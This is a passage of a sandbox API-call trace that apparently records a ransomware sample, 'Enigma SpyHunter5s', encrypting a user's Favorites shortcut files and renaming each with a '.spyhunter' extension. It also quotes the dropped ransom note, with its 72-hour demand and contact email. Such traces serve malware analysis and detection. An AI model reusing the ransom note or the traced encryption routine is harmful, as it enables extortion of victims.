(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0148.426] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f044, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f044*=0x2ac, lpOverlapped=0x0) returned 1 [0148.426] CloseHandle (hObject=0x9c) returned 1 [0148.426] GetProcessHeap () returned 0x2c0000 [0148.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb59d8 | out: hHeap=0x2c0000) returned 1 [0148.426] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efe0 | out: pbBuffer=0x248efe0) returned 1 [0148.427] GetProcessHeap () returned 0x2c0000 [0148.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.427] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efd8*=0x30) returned 1 [0148.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0148.428] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".txt") returned 0x0 [0148.428] GetProcessHeap () returned 0x2c0000 [0148.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.428] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef9c*=0x85, lpOverlapped=0x0) returned 1 [0148.429] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.429] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef9c*=0x85, lpOverlapped=0x0) returned 1 [0148.429] GetProcessHeap () returned 0x2c0000 [0148.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.429] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.429] WriteFile (in: hFile=0x9c, lpBuffer=0x248efdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef9c, lpOverlapped=0x0 | out: lpBuffer=0x248efdc*, lpNumberOfBytesWritten=0x248ef9c*=0x4, lpOverlapped=0x0) returned 1 [0148.429] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef9c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef9c*=0x30, lpOverlapped=0x0) returned 1 [0148.429] CloseHandle (hObject=0x9c) returned 1 [0148.429] GetProcessHeap () returned 0x2c0000 [0148.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.429] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.spyhunter") returned 90 [0148.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.spyhunter")) returned 1 [0148.430] GetProcessHeap () returned 0x2c0000 [0148.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.430] GetProcessHeap () returned 0x2c0000 [0148.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.430] GetProcessHeap () returned 0x2c0000 [0148.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64308 | out: hHeap=0x2c0000) returned 1 [0148.430] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efe0 | out: pbBuffer=0x248efe0) returned 1 [0148.430] GetProcessHeap () returned 0x2c0000 [0148.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.431] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efd8*=0x30) returned 1 [0148.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.431] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0148.431] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".txt") returned 0x0 [0148.431] GetProcessHeap () returned 0x2c0000 [0148.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.431] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef9c*=0x85, lpOverlapped=0x0) returned 1 [0148.432] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.432] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef9c*=0x85, lpOverlapped=0x0) returned 1 [0148.432] GetProcessHeap () returned 0x2c0000 [0148.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.432] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.432] WriteFile (in: hFile=0x9c, lpBuffer=0x248efdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef9c, lpOverlapped=0x0 | out: lpBuffer=0x248efdc*, lpNumberOfBytesWritten=0x248ef9c*=0x4, lpOverlapped=0x0) returned 1 [0148.432] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef9c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef9c*=0x30, lpOverlapped=0x0) returned 1 [0148.433] CloseHandle (hObject=0x9c) returned 1 [0148.433] GetProcessHeap () returned 0x2c0000 [0148.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.433] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.spyhunter") returned 88 [0148.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.spyhunter")) returned 1 [0148.433] GetProcessHeap () returned 0x2c0000 [0148.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.433] GetProcessHeap () returned 0x2c0000 [0148.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.433] GetProcessHeap () returned 0x2c0000 [0148.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f958 | out: hHeap=0x2c0000) returned 1 [0148.434] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efd8 | out: pbBuffer=0x248efd8) returned 1 [0148.434] GetProcessHeap () returned 0x2c0000 [0148.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.434] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efd0*=0x30) returned 1 [0148.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.434] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0148.434] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".txt") returned 0x0 [0148.434] GetProcessHeap () returned 0x2c0000 [0148.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.434] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef94*=0x85, lpOverlapped=0x0) returned 1 [0148.435] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.435] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef94*=0x85, lpOverlapped=0x0) returned 1 [0148.435] GetProcessHeap () returned 0x2c0000 [0148.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.435] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.435] WriteFile (in: hFile=0x9c, lpBuffer=0x248efd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef94, lpOverlapped=0x0 | out: lpBuffer=0x248efd4*, lpNumberOfBytesWritten=0x248ef94*=0x4, lpOverlapped=0x0) returned 1 [0148.436] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef94, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef94*=0x30, lpOverlapped=0x0) returned 1 [0148.436] CloseHandle (hObject=0x9c) returned 1 [0148.436] GetProcessHeap () returned 0x2c0000 [0148.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.436] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.spyhunter") returned 91 [0148.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.spyhunter")) returned 1 [0148.436] GetProcessHeap () returned 0x2c0000 [0148.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.436] GetProcessHeap () returned 0x2c0000 [0148.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.437] GetProcessHeap () returned 0x2c0000 [0148.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64218 | out: hHeap=0x2c0000) returned 1 [0148.437] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efd8 | out: pbBuffer=0x248efd8) returned 1 [0148.437] GetProcessHeap () returned 0x2c0000 [0148.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.437] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efd0*=0x30) returned 1 [0148.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0148.439] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".txt") returned 0x0 [0148.439] GetProcessHeap () returned 0x2c0000 [0148.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.440] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef94*=0x85, lpOverlapped=0x0) returned 1 [0148.440] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.440] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef94*=0x85, lpOverlapped=0x0) returned 1 [0148.440] GetProcessHeap () returned 0x2c0000 [0148.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.441] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.441] WriteFile (in: hFile=0x9c, lpBuffer=0x248efd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef94, lpOverlapped=0x0 | out: lpBuffer=0x248efd4*, lpNumberOfBytesWritten=0x248ef94*=0x4, lpOverlapped=0x0) returned 1 [0148.441] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef94, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef94*=0x30, lpOverlapped=0x0) returned 1 [0148.441] CloseHandle (hObject=0x9c) returned 1 [0148.441] GetProcessHeap () returned 0x2c0000 [0148.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.441] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.spyhunter") returned 87 [0148.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.spyhunter")) returned 1 [0148.442] GetProcessHeap () returned 0x2c0000 [0148.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.442] GetProcessHeap () returned 0x2c0000 [0148.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.442] GetProcessHeap () returned 0x2c0000 [0148.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f870 | out: hHeap=0x2c0000) returned 1 [0148.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.443] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0148.443] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef07*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f030, lpOverlapped=0x0 | out: lpBuffer=0x248ef07*, lpNumberOfBytesWritten=0x248f030*=0x127, lpOverlapped=0x0) returned 1 [0148.444] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0148.444] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f030, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f030*=0x2ac, lpOverlapped=0x0) returned 1 [0148.444] CloseHandle (hObject=0x9c) returned 1 [0148.444] GetProcessHeap () returned 0x2c0000 [0148.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5ab8 | out: hHeap=0x2c0000) returned 1 [0148.444] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efd0 | out: pbBuffer=0x248efd0) returned 1 [0148.444] GetProcessHeap () returned 0x2c0000 [0148.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.444] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efc8*=0x30) returned 1 [0148.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.446] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0148.446] StrStrW (lpFirst="MSNBC News.url", lpSrch=".txt") returned 0x0 [0148.446] GetProcessHeap () returned 0x2c0000 [0148.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.446] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef8c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef8c*=0x85, lpOverlapped=0x0) returned 1 [0148.447] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.447] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef8c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef8c*=0x85, lpOverlapped=0x0) returned 1 [0148.447] GetProcessHeap () returned 0x2c0000 [0148.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.448] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.448] WriteFile (in: hFile=0x9c, lpBuffer=0x248efcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef8c, lpOverlapped=0x0 | out: lpBuffer=0x248efcc*, lpNumberOfBytesWritten=0x248ef8c*=0x4, lpOverlapped=0x0) returned 1 [0148.448] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef8c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef8c*=0x30, lpOverlapped=0x0) returned 1 [0148.448] CloseHandle (hObject=0x9c) returned 1 [0148.448] GetProcessHeap () returned 0x2c0000 [0148.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.448] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.spyhunter") returned 81 [0148.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.spyhunter")) returned 1 [0148.449] GetProcessHeap () returned 0x2c0000 [0148.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.450] GetProcessHeap () returned 0x2c0000 [0148.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.450] GetProcessHeap () returned 0x2c0000 [0148.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81c00 | out: hHeap=0x2c0000) returned 1 [0148.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efc8 | out: pbBuffer=0x248efc8) returned 1 [0148.450] GetProcessHeap () returned 0x2c0000 [0148.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.450] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efc0*=0x30) returned 1 [0148.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.452] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0148.452] StrStrW (lpFirst="MSN.url", lpSrch=".txt") returned 0x0 